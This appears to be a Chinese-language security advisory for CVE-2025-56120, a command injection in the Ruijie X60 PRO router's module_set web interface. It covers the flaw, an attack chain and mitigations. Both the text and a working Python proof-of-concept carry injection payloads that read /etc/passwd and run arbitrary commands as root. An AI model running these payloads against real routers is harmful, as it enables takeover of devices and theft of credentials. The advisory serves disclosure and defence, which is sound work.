CVE-2025-56120 Ruijie X60 PRO路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56120

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00/V2.00

漏洞概述

CVE-2025-56120是锐捷网络（Ruijie）X60 PRO路由器中存在的一个严重的操作系统命令注入漏洞。该漏洞存在于路由器的Web管理界面中，具体位于/usr/local/lua/dev_config/config_retain.lua文件中的module_set接口。攻击者可以通过构造恶意的POST请求，在未经充分安全验证的情况下，向该接口注入任意操作系统命令。由于该漏洞的CVSS评分达到8.8分，属于高危漏洞，对受影响设备的机密性、完整性和可用性都造成严重影响。受影响的路由器型号为X60_10212014RG-X60 PRO，涵盖V1.00和V2.00两个版本。攻击者可以利用此漏洞完全控制受影响的路由器设备，执行任意系统命令，包括但不限于读取敏感配置文件、修改系统设置、植入后门程序或进行横向移动攻击企业内部网络。此漏洞无需高级权限即可利用，认证要求为低权限（PR:L），这大大增加了漏洞被利用的风险。

技术细节

该漏洞是典型的OS命令注入（Command Injection）问题，源于应用程序对用户输入缺乏充分的验证和过滤。在Ruijie X60 PRO路由器的Web管理功能中，module_set接口负责处理模块配置请求。该接口在处理POST请求参数时，直接将用户可控的输入传递给系统命令执行函数，而未进行任何命令隔离或输入净化处理。具体来说，攻击者可以通过POST请求向/module_set端点发送包含恶意命令的载荷。漏洞文件位于/usr/local/lua/dev_config/config_retain.lua，该Lua脚本在处理请求时，会将HTTP参数中的值拼接到系统命令字符串中执行。攻击者只需构造形如';whoami;'或';cat /etc/passwd;'等payload，即可实现命令注入。由于路由器通常以root权限运行Web服务，注入的命令将以最高权限执行，攻击者可获得完整的系统控制权。此外，该接口的认证要求较低（PR:L），只需低权限账户即可访问，进一步降低了利用门槛。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标设备为Ruijie X60 PRO路由器，确定其IP地址和Web管理界面地址

STEP 2

步骤2：认证获取

攻击者获取路由器低权限账户凭据（默认凭据或通过其他方式获取），登录Web管理界面

STEP 3

步骤3：构造恶意请求

攻击者构造包含命令注入payload的POST请求，目标是/module_set接口，payload示例：'; whoami; #'

STEP 4

步骤4：发送漏洞利用请求

向目标路由器的/usr/local/lua/dev_config/config_retain.lua文件中的module_set端点发送恶意POST请求

STEP 5

步骤5：命令执行

由于输入验证不足，攻击者的恶意命令被拼接到系统命令中执行，以root权限运行

STEP 6

步骤6：持久化控制

攻击者可进一步植入后门、修改配置或横向移动攻击内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56120 PoC - Ruijie X60 PRO Command Injection
# Target: Ruijie X60 PRO Router (X60_10212014RG-X60 PRO V1.00/V2.00)
# Vulnerability: OS Command Injection in module_set endpoint
# File affected: /usr/local/lua/dev_config/config_retain.lua

def exploit_command_injection(target_url, command):
    """
    Exploit the command injection vulnerability in Ruijie X60 PRO router
    
    Args:
        target_url: Base URL of the target router web interface
        command: Command to execute on the target system
    
    Returns:
        Response from the target server
    """
    endpoint = f"{target_url}/module_set"
    
    # Payload construction with command injection
    # Using semicolon to chain commands
    payload = f"'; {command}; #'"
    
    data = {
        'module_name': 'config_retain',
        'command': payload
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_56120_poc.py <target_url> <command>")
        print("Example: python cve_2025_56120_poc.py http://192.168.1.1 'cat /etc/passwd'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Executing command: {cmd}")
    
    result = exploit_command_injection(target, cmd)
    print("\n[+] Response:")
    print(result)

if __name__ == "__main__":
    main()

影响范围

Ruijie X60 PRO X60_10212014RG-X60 PRO V1.00

Ruijie X60 PRO X60_10212014RG-X60 PRO V2.00

防御指南

临时缓解措施

立即限制路由器的Web管理界面访问权限，仅允许受信任的管理IP访问。同时在网络层面对/module_set等可疑接口的请求进行监控和过滤。建议联系设备厂商获取官方安全更新和补丁，在补丁发布前可考虑使用ACL限制对路由器管理接口的访问，并将管理平面与业务平面隔离。对于无法立即更新的场景，可通过防火墙规则限制对路由器Web管理端口的非授权访问，同时加强监控以检测潜在的漏洞利用行为。